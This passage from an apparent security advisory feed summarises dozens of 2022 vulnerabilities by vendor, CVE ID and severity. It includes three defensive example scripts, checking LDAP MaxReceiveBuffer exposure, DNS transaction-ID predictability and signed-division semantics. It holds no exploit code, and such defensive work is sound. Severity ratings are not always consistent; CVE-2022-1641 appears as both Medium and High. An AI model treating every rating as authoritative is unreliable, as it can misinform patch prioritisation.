mitigations are available. CVE ID: CVE-2022-1261 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
VMware has released a security update to address an XML External Entity (XXE) vulnerability
in VMware Tools for Windows that can cause a Denial of Service (DoS) condition or unintended
information disclosure. The affected products are VMware Tools for Windows versions 12.0.0,
11.x.y and 10.x.y. CVE ID: CVE-2022-22977 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Mitsubishi Electric has released security updates and workarounds to resolve multiple
vulnerabilities in its TCP Protocol Stack and Multiple FA Engineering software
products. CVE ID: CVE-2021-20587 (High), CVE-2021-20588 (High), CVE-2020-14521,
CVE-2020-16226, CVE-2020-14496
Zyxel has released security updates to address multiple vulnerabilities in Zyxel firewalls,
AP controllers and APs. CVE ID: CVE-2022-0734, CVE-2022-26531, CVE-2022-26532, CVE-2022-0910 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
SUSE has released security updates to resolve a vulnerability in Linux Kernel that can cause
a Denial of Service (DoS) or a kernel information leak. CVE ID: CVE-2022-1280 (Medium)
Mozilla has released security updates to address multiple vulnerabilities in Firefox
100.0.2, Firefox for Android 100.3.0, Firefox ESR 91.9.1, and Thunderbird 91.9.1. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-1802 (Critical), CVE-2022-1529 (Critical)
Cisco has released security updates to resolve a vulnerability in the health check RPM of
Cisco IOS XR software that can allow an unauthenticated, remote attacker to access the Redis
instance that runs within the NOSi container. CVE ID: CVE-2022-20821 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Ubuntu has released a security update to resolve a SQL injection vulnerability in OpenLDAP.
The affected releases are Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. CVE ID: CVE-2022-29155 (Critical)
Dell has released security updates for Dell EMC VxRail Appliance and Dell EMC Elastic Cloud
Storage to resolve multiple third-party vulnerabilities that can be exploited by malicious
users to compromise the affected system.
Google has released Chrome Beta 103 (103.0.5060.10) for iOS, Chrome Dev 103 (103.0.5060.13)
for Android, and Dev channel 103.0.5060.13 for Windows, Mac and Linux.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in NETGEAR BR200 and BR500 routers that can be
exploited if a user visits a malicious website or clicks a malicious link while accessing
the router's management GUI. The mitigations are available.
A security update has been released to resolve a Cross-Site Scripting (XSS) vulnerability in
the Google Tag Manager plugin for WordPress. The affected versions are Google Tag Manager
versions up to and including 1.15. CVE ID: CVE-2022-1707 (Medium)
Apple has released security updates to address multiple vulnerabilities in iTunes for
Windows. An attacker can exploit these vulnerabilities to take control of an affected
device. CVE ID: CVE-2022-26751, CVE-2022-26711, CVE-2022-26774, CVE-2022-26773,
CVE-2022-26717
ISC has released a security update for BIND to address an assertion failure vulnerability.
The affected versions are BIND 9.18.0 through 9.18.2, and 9.19.0 of the BIND 9.19
development branch. CVE ID: CVE-2022-1183 (High)
VMware has released security updates to resolve authentication bypass and local privilege
escalation vulnerabilities in its products. An attacker can exploit these vulnerabilities to
take control of an affected system. CVE ID: CVE-2022-22972 (Critical), CVE-2022-22973 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-1736, CVE-2022-1183, CVE-2016-7947 (Critical), CVE-2016-7948
(Critical)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Dell has released security updates to resolve critical vulnerabilities in Dell Technologies
PowerProtect Data Domain and Dell EMC Enterprise Hybrid Cloud. CVE ID: CVE-2022-24422 (Critical), CVE-2022-22972 (Critical)
Multiple vulnerabilities have been discovered in several Jenkins plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A stack-based buffer overflow vulnerability has been discovered in Circutor's COMPACT DC-S
BASIC. Successful exploitation can cause Remote Code Execution (RCE). CVE ID: CVE-2022-1669 (Medium)
Wordfence has reported an unauthenticated SQL injection vulnerability in the RSVPMaker
plugin for WordPress, and a security update is available. The affected versions are
RSVPMaker versions up to and including 9.3.2. CVE ID: CVE-2022-1768 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
An integer overflow vulnerability has been discovered in VMware's Spring Security. The
affected versions are Spring Security 5.5.x prior to 5.5.7, 5.6.x prior to 5.6.4, and older
unsupported versions. The mitigations are available. CVE ID: CVE-2022-22976 (Medium)
Zoom has released security updates to resolve multiple vulnerabilities in Zoom Client for
Meetings affecting several platforms. An attacker can exploit these vulnerabilities to take
control of an affected system. CVE ID: CVE-2022-22787 (Medium), CVE-2022-22786 (High), CVE-2022-22785 (Medium),
CVE-2022-22784 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Mitsubishi Electric has released security updates to address multiple Denial-of-Service
(DoS) vulnerabilities in the MELSEC iQ-F series CPU module. CVE ID: CVE-2022-25161 (High), CVE-2022-25162 (Medium)
Synology has released security updates for Synology Calendar to address a vulnerability that
allows remote authenticated users to inject arbitrary web script or HTML via a susceptible
version of Synology Calendar.
Apple has released security updates to resolve vulnerabilities in multiple products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
NVIDIA has released security updates to resolve multiple vulnerabilities in the NVIDIA GPU
Display Driver which can lead to Denial of Service (DoS), information disclosure, or data
tampering.
Spring has released security updates to address an authorization bypass vulnerability in
RegexRequestMatcher. The affected versions are Spring Security 5.5.6 and 5.6.3 and older
unsupported versions. CVE ID: CVE-2022-22975 (High)
Dell has released security updates for Dell EMC RecoverPoint to address multiple
vulnerabilities that can be exploited by malicious users to compromise the affected
system. CVE ID: CVE-2021-4034, CVE-2021-44832
A vulnerability has been discovered in Apache Tomcat 9.0.0.M1 to 9.0.20 and 8.5.0 to 8.5.75.
An attacker can exploit this vulnerability to obtain sensitive information. The mitigations
are available. CVE ID: CVE-2022-25762 (High)
Delta Electronics has released a security update to address stack-based buffer overflow and
out-of-bounds read vulnerabilities in Delta Electronics' CNCSoft. Successful exploitation
can allow arbitrary code execution or information disclosure. CVE ID: CVE-2022-1405 (High), CVE-2022-1404 (Low)
Inkscape has released a security update to address multiple vulnerabilities in Inkscape
version 0.91. Successful exploitation of these vulnerabilities can allow unauthorized
information disclosure and code execution. CVE ID: CVE-2021-42700 (Low), CVE-2021-42702 (Low), CVE-2021-42704 (High)
Cambium Networks has released security updates to address multiple vulnerabilities in
Cambium Networks' cnMaestro. Successful exploitation can cause Remote Code Execution (RCE),
sensitive data exfiltration and complete takeover of the main multi-tenant cloud
infrastructure. CVE ID: CVE-2022-1357 (Critical), CVE-2022-1358 (Medium), CVE-2022-1361 (High),
CVE-2022-1360 (High), CVE-2022-1362 (Medium), CVE-2022-1359 (Medium), CVE-2022-1356 (High)
Zyxel has released security updates to address an OS command injection vulnerability in its
products. A command injection vulnerability in the CGI program of some firewall versions can
allow an attacker to modify specific files and then execute some OS commands on a vulnerable
device. CVE ID: CVE-2022-30525
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
SUSE has released security updates to resolve multiple vulnerabilities in several products.
CVE ID: CVE-2022-20770 (High), CVE-2022-20771 (High), CVE-2022-20785 (High),
CVE-2022-20792, CVE-2022-20796 (Medium)
Dell BIOS contains improper input validation vulnerabilities. A local authenticated malicious
user can exploit them by using an SMI to gain arbitrary code execution during SMM. CVE ID: CVE-2022-24417 (High), CVE-2022-24418 (High)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-20681 (High), CVE-2022-20677 (Medium), CVE-2022-20718 (Medium),
CVE-2022-20719 (Medium)
Google has released Chrome Dev 103 (103.0.5055.0) for Android, Dev channel 103.0.5056.0 for
Linux and Mac, 103.0.5057.3 for Windows, Stable channel 101.0.4951.67 for Windows, Chrome
Beta 102 (102.0.5005.50) for iOS and Android.
Mitsubishi Electric has released a security update to address multiple vulnerabilities
discovered in the Open Source Software (OSS) used by the VisualSVN Server component of
Mitsubishi Electric's MELSOFT iQ AppPortal. Exploitation of these vulnerabilities can allow an
attacker to disclose or tamper with information within the product, cause a Denial of
Service (DoS) condition or execute malicious programs. CVE ID: CVE-2020-13938 (Medium), CVE-2021-26691 (Critical), CVE-2021-34798 (High),
CVE-2021-3711 (Critical), CVE-2021-44790 (Critical), CVE-2022-22720 (Critical),
CVE-2022-23943 (Critical), CVE-2022-0778 (High)
Ubuntu has released security updates to address several vulnerabilities in the Linux kernel.
An attacker can exploit these vulnerabilities to take control of an affected system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Spring has released security updates to resolve multiple denial of service vulnerabilities
discovered in various Spring products. CVE ID: CVE-2022-22971 (Medium), CVE-2022-22970 (Medium)
HP has released security updates to mitigate multiple vulnerabilities discovered in the BIOS
(UEFI Firmware) for certain HP PC products, which can allow arbitrary code execution. CVE ID: CVE-2021-3808 (High), CVE-2021-3809 (High)
Dell has released a security update to address a reflected Cross-Site Scripting vulnerability
in the Unisphere UI of Dell Unity, Dell UnityVSA, and Dell UnityXT. Exploitation of this
vulnerability can lead to information disclosure, session theft, or client-side request
forgery. CVE ID: CVE-2022-29091 (Medium)
SUSE has released security updates to resolve multiple vulnerabilities in several
products. CVE ID: CVE-2021-28688 (Medium), CVE-2021-39713 (Critical), CVE-2022-1011 (High),
CVE-2022-0330 (High), CVE-2022-1158
Multiple vulnerabilities have been discovered in the firmware and libraries utilized by
RAD-ISM-900-EN-BD devices of Phoenix Contact. These vulnerabilities can allow an attacker to
execute arbitrary shell commands and/or upload arbitrary files to the device with root
privileges. The family of RAD-ISM-900-EN-BD devices is end of life and will not receive
updates anymore.
CVE ID: CVE-2022-29897 (Critical), CVE-2022-29898 (Critical)
Microsoft has released updates to address multiple vulnerabilities in its software. An
attacker can exploit some of these vulnerabilities to take control of an affected system.
A spoofing vulnerability has been discovered in the Windows Local Security Authority (LSA).
An unauthenticated attacker can call a method on the LSARPC interface and coerce the domain
controller to authenticate to the attacker using NTLM. CVE ID: CVE-2022-26925 (High)
Hitachi Energy has released a security update to address multiple vulnerabilities in Hitachi
Energy's TXpert Hub CoreTec 4. An attacker can exploit these vulnerabilities to take control
of the system node. CVE ID: CVE-2021-3156 (High), CVE-2021-35530 (Medium), CVE-2021-35531 (Medium),
CVE-2021-35532 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Intel has released security updates to address multiple vulnerabilities in its products. A
remote attacker can exploit these vulnerabilities to take control of an affected system.
Google has released updated Extended Stable channel 100.0.4896.160 for Windows and Mac, and
Stable channel 101.0.4951.64 for Windows, Mac and Linux to resolve multiple
vulnerabilities. CVE ID: CVE-2022-1633 (High), CVE-2022-1634 (High), CVE-2022-1635 (High),
CVE-2022-1636 (High), CVE-2022-1637 (High), CVE-2022-1638 (High), CVE-2022-1639 (High),
CVE-2022-1640 (High), CVE-2022-1641 (Medium)
Microsoft has released security updates to address a Remote Code Execution vulnerability in
Windows LDAP. An unauthenticated attacker can send a specially crafted request to a
vulnerable server. Successful exploitation can result in the attacker's code running in the
context of the SYSTEM account. CVE ID: CVE-2022-29130 (Critical)
Microsoft has released security updates to address a Remote Code Execution vulnerability in
Windows LDAP. An unauthenticated attacker can send a specially crafted request to a
vulnerable server. This vulnerability is only exploitable if the MaxReceiveBuffer LDAP
policy is set to a value higher than the default value. Successful exploitation can result
in the attacker's code running in the context of the SYSTEM account. CVE ID: CVE-2022-22012 (Critical)
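The MaxReceiveBuffer condition makes this one worth checking before assuming a domain controller is exposed. The script below is an added example, not code from Microsoft's advisory: it parses the multi-valued lDAPAdminLimits attribute of a DC's query policy, as exported with ldifde or read with Get-ADObject, and reports whether MaxReceiveBuffer has been raised above the documented default of 10485760 bytes (10 MB). The LDIF snippet is constructed for the example; the domain example.com and the raised 20 MB value are assumptions.

```python
# Added example: decide whether a domain controller's LDAP query policy raises
# MaxReceiveBuffer above the default that CVE-2022-22012 exploitation depends on.
# Not Microsoft code; the LDIF below is constructed and example.com is a placeholder.

DEFAULT_MAX_RECEIVE_BUFFER = 10_485_760   # documented default, 10 MB

# Typical export: ldifde -f policy.ldf -d "<policy DN>" -p base -l lDAPAdminLimits
SAMPLE_LDIF = """\
dn: CN=Default Query Policy,CN=Query-Policies,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=example,DC=com
changetype: add
lDAPAdminLimits: MaxReceiveBuffer=20971520
lDAPAdminLimits: MaxPageSize=1000
lDAPAdminLimits: MaxConnections=5000
"""


def parse_ldap_admin_limits(ldif_text: str) -> dict:
    """Collect the Name=Value pairs of the multi-valued lDAPAdminLimits attribute."""
    limits = {}
    for line in ldif_text.splitlines():
        attr, sep, value = line.partition(":")
        if not sep or attr.strip().lower() != "ldapadminlimits":
            continue
        name, eq, number = value.strip().partition("=")
        if eq and number.strip().lstrip("-").isdigit():
            limits[name.strip()] = int(number)
    return limits


def max_receive_buffer_status(limits: dict, default: int = DEFAULT_MAX_RECEIVE_BUFFER) -> tuple:
    """Return (effective value, True if raised above the default)."""
    effective = limits.get("MaxReceiveBuffer", default)   # absent means the default applies
    return effective, effective > default


if __name__ == "__main__":
    limits = parse_ldap_admin_limits(SAMPLE_LDIF)
    value, raised = max_receive_buffer_status(limits)
    print("MaxReceiveBuffer=%d %s" % (
        value, "ABOVE DEFAULT: exposed until patched" if raised else "at or below default"))
```

The Default Query Policy is not always the effective one: a DC or its site can be assigned its own policy object through the queryPolicyObject attribute on the NTDS Settings or NTDS Site Settings object, so run the check against whichever policy actually applies to each DC. Patching remains the fix either way; a default MaxReceiveBuffer only narrows exposure to this particular CVE.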
Microsoft has released security updates to address a Remote Code Execution vulnerability in
Windows Network File System. This vulnerability can be exploited over the network by making
an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger
a Remote Code Execution. CVE ID: CVE-2022-26937 (Critical)
Microsoft's Windows 11 Update KB5012643 appears to affect some .NET Framework 3.5 apps. The
affected apps are using certain optional components in .NET Framework 3.5, such as Windows
Communication Foundation (WCF) and Windows Workflow (WWF) components. Microsoft has released
a workaround to mitigate the issue.
Mitsubishi Electric has released security updates to resolve multiple vulnerabilities in
MELSOFT GT OPC UA Client and Wireless Communication Standards IEEE 802.11.
Microsoft has released a security update to address a remote code execution vulnerability
affecting Azure Data Factory and Azure Synapse Pipelines. The vulnerability was discovered
in the third-party ODBC data connector used to connect to Amazon Redshift in Azure Data
Factory Integration Runtime (IR) and Azure Synapse Pipelines. A remote attacker can exploit
this vulnerability to take control of an affected system. CVE ID: CVE-2022-29972
It has been discovered that the uClibc and uClibc-ng libraries are vulnerable to DNS cache
poisoning due to the use of predictable DNS transaction IDs when making DNS requests. This
vulnerability can allow an attacker to perform DNS cache poisoning attacks against a
vulnerable environment.
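Checking a resolver for this weakness needs only the transaction IDs it emits on a run of consecutive queries, read off a packet capture. The script below is an added example (not from the uClibc project or from the disclosure): given a list of 16-bit IDs in the order observed, it measures how often the next ID could have been predicted from the previous one plus the most common delta, and reports the guess space an off-path attacker faces. Both ID sequences are constructed for the example, the incrementing one standing in for a predictable generator and the other for a random one.

```python
from collections import Counter

# Added example: estimate how predictable a resolver's DNS transaction IDs are from
# IDs observed on consecutive queries (e.g. read off a packet capture). Not code from
# the uClibc project or the disclosure. Both ID sequences below are constructed.
TXID_SPACE = 1 << 16     # DNS transaction IDs are 16 bits

# Stand-in for a generator that just increments (the shape of the weakness described)
INCREMENTING_IDS = [0x0a00 + i for i in range(12)]
# Stand-in for a generator that draws IDs randomly
RANDOM_IDS = [0x3f2a, 0x91c4, 0x0b77, 0xe8d1, 0x52ee, 0xa013,
              0x7d9c, 0x1e45, 0xc6b8, 0x3480, 0xf902, 0x6a5d]


def assess_txids(ids, threshold=0.5):
    """Score a sequence of 16-bit IDs: how often next == prev + most common delta."""
    if len(ids) < 3:
        raise ValueError("need at least three observed IDs")
    deltas = [(b - a) % TXID_SPACE for a, b in zip(ids, ids[1:])]   # modulo handles wraparound
    step, count = Counter(deltas).most_common(1)[0]
    hit_rate = count / len(deltas)          # fraction of IDs an observer could have predicted
    predictable = hit_rate >= threshold
    return {
        "samples": len(ids),
        "distinct": len(set(ids)),
        "step": step,
        "hit_rate": hit_rate,
        "predictable": predictable,
        # forged replies an off-path attacker needs to match the ID, ignoring source port
        "expected_guesses": 1 if predictable else TXID_SPACE,
    }


if __name__ == "__main__":
    for label, seq in (("incrementing", INCREMENTING_IDS), ("random", RANDOM_IDS)):
        r = assess_txids(seq)
        print("%-12s hit_rate=%.2f predictable=%s guesses=%d"
              % (label, r["hit_rate"], r["predictable"], r["expected_guesses"]))
```

A random ID on its own is still only 16 bits of entropy; without source-port randomization that is the whole space an attacker has to cover with forged replies, which is why resolvers randomize both. For a device that cannot be patched, putting a validating or caching resolver that does both in front of it limits the damage.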
Ubuntu has released a security update to address a use-after-free vulnerability in DBus caused
by incorrect handling of usernames that share the same UID. An attacker can use this
vulnerability to crash DBus, resulting in a denial of service. CVE ID: CVE-2020-35512 (High)
Google has released Chrome 101 (101.0.4951.61) for Android and Stable channel
101.0.4951.59 (Platform version: 14588.98.0) for most Chrome OS devices to resolve multiple
vulnerabilities. CVE ID: CVE-2022-1633 (High), CVE-2022-1634 (High), CVE-2022-1635 (High),
CVE-2022-1636 (High), CVE-2022-1637 (High), CVE-2022-1638 (High), CVE-2022-1639 (High),
CVE-2022-1640 (High), CVE-2022-1641 (High)
Foxit has released Foxit PDF Reader 11.2.2 and Foxit PDF Editor 11.2.2 to resolve multiple
vulnerabilities in Foxit PDF Reader 11.2.1.53537 and earlier versions, Foxit PDF Editor
11.2.1.53537 and all previous 11.x versions, 10.1.7.37777 and earlier versions.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
It has been discovered that Solana rBPF is affected by an incorrect calculation vulnerability
caused by an improper implementation of the sdiv instruction. This vulnerability can lead
to the wrong execution path, which can result in substantial losses in specific cases. CVE ID: CVE-2022-23066 (Critical)
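As an added example (not rBPF code and not a description of the specific rBPF defect), here is what a signed-division ALU helper in a bytecode interpreter has to get right, written in Python, where the language's own // operator floors rather than truncating toward zero. The zero-divisor and overflow behaviours chosen (result 0, and INT_MIN / -1 wrapping back to INT_MIN) are stated assumptions for the demonstration.

```python
def to_signed(value: int, bits: int) -> int:
    """Interpret the low `bits` bits of a register as a two's-complement integer."""
    mask = (1 << bits) - 1
    value &= mask
    return value - (1 << bits) if value >> (bits - 1) else value


def to_register(value: int, bits: int) -> int:
    """Wrap a Python integer back into a `bits`-wide register (unsigned view)."""
    return value & ((1 << bits) - 1)


def naive_sdiv(dst: int, src: int, bits: int = 64) -> int:
    """The tempting one-liner.  Python's // floors toward -inf, so -7 / 2 yields
    -4 instead of the -3 that C, LLVM and BPF semantics (truncation toward zero)
    require, and a zero divisor is left to raise instead of being defined."""
    return to_register(to_signed(dst, bits) // to_signed(src, bits), bits)


def sdiv(dst: int, src: int, bits: int = 64) -> int:
    """Signed division as an ALU performs it on `bits`-wide registers.

    Assumed semantics for this example: truncate toward zero; a zero divisor
    yields 0 (the convention BPF uses for unsigned DIV); INT_MIN / -1 does not
    trap but wraps back to INT_MIN.  Returns the raw register value.
    """
    if bits not in (32, 64):
        raise ValueError("BPF ALU operands are 32 or 64 bits wide")
    a, b = to_signed(dst, bits), to_signed(src, bits)
    if b == 0:
        return 0
    quotient = abs(a) // abs(b)            # exact magnitude, no rounding issue
    if (a < 0) != (b < 0):
        quotient = -quotient               # restore the sign of the true quotient
    return to_register(quotient, bits)     # INT_MIN / -1 overflows here and wraps


INT64_MIN_REG = 1 << 63          # 0x8000000000000000
MINUS_ONE_64 = (1 << 64) - 1     # 0xFFFFFFFFFFFFFFFF

if __name__ == "__main__":
    minus_seven = to_register(-7, 64)
    print(hex(naive_sdiv(minus_seven, 2)))  # 0xfffffffffffffffc  (-4, wrong)
    print(hex(sdiv(minus_seven, 2)))        # 0xfffffffffffffffd  (-3, correct)
    print(hex(sdiv(INT64_MIN_REG, MINUS_ONE_64)))  # 0x8000000000000000 (wraps)
    print(sdiv(5, 0))                        # 0
```

The three cases that matter in review are the negative quotient (rounding direction), INT_MIN divided by -1 (the only overflow signed division can produce), and the zero divisor; a 32-bit variant additionally has to sign-extend its operands from the low half of the register before dividing, which is why the width is a parameter here.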
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
It has been discovered that due to a vulnerability in the yank action, any RubyGems.org user
can remove and replace certain gems even if that user was not authorized to do so. CVE ID: CVE-2022-29176 (Critical)
It has been discovered that multiple Tecson Tankspion and GOKs SmartBox products are
affected by a vulnerability in which access to the endpoint responsible for saving settings
is not properly restricted, leaving it reachable by unauthenticated users and users with
limited access rights. CVE ID: CVE-2019-12254 (Critical)
Ubuntu has released security updates to address several vulnerabilities in Cron. An attacker
can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2019-9706 (Medium), CVE-2019-9705 (Medium), CVE-2017-9525 (Medium),
CVE-2019-9704 (Medium)
It has been observed that the Lazarus Group, known for cryptocurrency theft, is widening its
scope to the VHD ransomware strain in the Asia-Pacific (APAC) region. Its tactics
include spear-phishing emails as well as the use of fake mobile applications.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Johnson Controls has released security updates to resolve a vulnerability in all Metasys
ADS/ADX/OAS 10 and 11 versions. Under certain circumstances, an authenticated user can lock
other users out of the system or take over their accounts. CVE ID: CVE-2022-21934
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-20777 (Critical), CVE-2022-20779 (High), CVE-2022-20780 (High),
CVE-2022-20796 (Medium), CVE-2022-20785 (Medium), CVE-2022-20770 (Medium), CVE-2022-20771
(Medium), CVE-2022-20734 (Medium), CVE-2022-20799 (Medium), CVE-2022-20801 (Medium),
CVE-2022-20753 (Medium), CVE-2022-20764 (Medium), CVE-2022-20794 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Dell has released a security update to address multiple vulnerabilities in Dell EMC
NetWorker vProxy. The affected versions are Dell EMC NetWorker vProxy 4.3.0-17 and earlier.
Drupal has released security updates to address multiple vulnerabilities in various Drupal
modules. The Duo Two-Factor Authentication module is no longer supported.
Missing Authentication for Critical Function vulnerability has been discovered in BIG-IP.
This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP
system through the management port and/or self IP addresses to execute arbitrary system
commands, create or delete files, or disable services. CVE ID: CVE-2022-1388 (Critical)
Multiple heap overflow vulnerabilities have been discovered in several Aruba products.
Successful exploitation of these vulnerabilities can result in the ability to execute
arbitrary code. The updates are available. CVE ID: CVE-2022-23676 (Critical), CVE-2022-23677 (Critical)
Cisco has released security updates to address a privilege escalation vulnerability in the
web services interface for remote access VPN features in multiple versions of Cisco Adaptive
Security Appliance (ASA) software and Cisco Firepower Threat Defense (FTD) software. CVE ID: CVE-2022-20759 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in Yokogawa CENTUM and ProSafe-RS equipment
which can allow leakage/tampering of data, cause a Denial-of-Service (DoS) condition, or
allow a local attacker to execute arbitrary programs. The mitigations are available. CVE ID: CVE-2022-27188 (Medium), CVE-2022-26034 (Medium), CVE-2019-0203 (High),
CVE-2018-11782 (Medium), CVE-2015-0248 (Medium)
Wordfence has released a security update to resolve a Cross-Site Scripting (XSS)
vulnerability in WP JS plugin for WordPress. The affected versions are WP JS versions up to
and including 2.0.6. CVE ID: CVE-2022-1567 (Medium)
Mozilla has released Firefox 100 and Firefox ESR 91.9 to address multiple vulnerabilities. An
attacker can exploit these vulnerabilities to take control of an affected system. CVE ID:
CVE-2022-29914 (High), CVE-2022-29909 (High), CVE-2022-29916 (High),
CVE-2022-29911 (High), CVE-2022-29912 (High), CVE-2022-29910 (High), CVE-2022-29915 (High),
CVE-2022-29917 (High), CVE-2022-29918 (High)
Moxa has released security updates to address a Remote Code Execution (RCE) vulnerability in
the Moxa MXview series. An attacker with local privileges can gain system privileges
and execute arbitrary code via a crafted module.
OpenSSL has released security updates to address multiple vulnerabilities in its products.
CVE ID: CVE-2022-1473 (Low), CVE-2022-1434 (Low), CVE-2022-1343, CVE-2022-1292
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities related to open-source software have been observed in Hitachi
Energy Gateway Station (GWS) and Hitachi Energy FACTS Control Platform (FCP) products.
Successful exploitation can allow an attacker to eavesdrop on traffic between a network
source and destination, gain unauthorized access to information, or cause a Denial-of-Service (DoS).
A Missing Authentication for Critical Function vulnerability has been discovered in multiple
versions of TRUMPF TruTops Boost, TruTops Fab and TruTops Monitor products. Execution of
this function can result in unauthorized access, modification of data or disruption of the whole
service. CVE ID: CVE-2022-1300 (Critical)
Ubuntu has released a security update to resolve a vulnerability in libinput on Ubuntu 22.04 LTS
that could cause libinput to crash or expose sensitive information.
Red Hat has released security updates to address multiple vulnerabilities in several
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Dell has released security updates to resolve multiple vulnerabilities in several products.
An attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-1215
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system.
Wordfence has released security updates to resolve a vulnerability in Ultimate Member plugin
in WordPress. The affected versions are Ultimate Member plugin versions up to and including
2.3.1. CVE ID: CVE-2022-1209 (Medium)
Cisco has released security updates to resolve the Spring Framework vulnerability in its
products. An attacker can exploit this vulnerability to take control of an affected
system. CVE ID: CVE-2022-22965 (Critical)
Tychon has released a security update to resolve a privilege escalation vulnerability due to
the use of an OPENSSLDIR variable which can cause arbitrary code execution with system
privileges. CVE ID: CVE-2022-26872
A privilege escalation vulnerability has been discovered in Windows software that uses Qt
versions prior to 5.14. The update is available. CVE ID: CVE-2022-26873
NVIDIA has released a software update for the Windows versions of Omniverse Nucleus and
Omniverse Cache to address a security issue that may lead to arbitrary code execution,
impacting confidentiality, integrity, and availability. CVE ID: CVE-2022-28198
Dell EMC NetWorker remediation is available for multiple security vulnerabilities. These
vulnerabilities may be exploited by malicious actors to compromise the affected system.
CVE ID: CVE-2022-29082
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-20714 (High), CVE-2022-20743 (High), CVE-2022-20740 (Medium)
Google has released updated Chrome Dev 103 (103.0.5028.0) for Android, Beta channel
Chrome 102.0.5005.27 for Windows, Mac and Linux, Dev channel 103.0.5028.0 for Windows,
Linux, and Mac, Chrome Beta 102 (102.0.5005.26) for Android, and LTS channel 96.0.4664.207
(Platform Version: 14268.82.0) for most ChromeOS devices to resolve multiple
vulnerabilities. CVE ID: CVE-2022-1312 (High), CVE-2022-1308 (High), CVE-2022-1311 (High),
CVE-2022-1125 (High), CVE-2022-1139 (Medium), CVE-2022-1364 (High)
Wordfence has released security updates to resolve an arbitrary file deletion vulnerability
in All-in-One WP Migration plugin. The affected versions are All-in-One WP Migration
versions up to and including 7.58. CVE ID: CVE-2022-1476 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Johnson Controls has released security updates to address a vulnerability that impacts
Metasys ADS/ADX/OAS Servers. Under certain circumstances an authenticated user can elevate
their privileges to Administrator. CVE ID: CVE-2021-36207
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Multiple vulnerabilities have been discovered in Synology DiskStation Manager (DSM) and
Synology Router Manager (SRM) that allow remote attackers to obtain sensitive information
and possibly execute arbitrary code via a susceptible version. Fixes are available
for some products. CVE ID: CVE-2022-0194, CVE-2022-23121, CVE-2022-23122, CVE-2022-23123,
CVE-2022-23124, CVE-2022-23125
Microsoft has released security updates to address a vulnerability in Azure Database for
PostgreSQL Flexible Server that can result in unauthorized cross-account database access in
a region.
A vulnerability has been discovered in Oracle Communications Billing and Revenue Management,
a product of Oracle Communications Applications, which allows an unauthenticated attacker
with network access via TCP to compromise it. The affected versions are 12.0.0.4 and
12.0.0.5. CVE ID: CVE-2022-21431 (Critical)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in Zoom, affecting several platforms. An
attacker can exploit these vulnerabilities to take control of an affected system. The
updates are available. CVE ID: CVE-2022-22783 (High), CVE-2022-22782 (High), CVE-2022-22781 (High)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
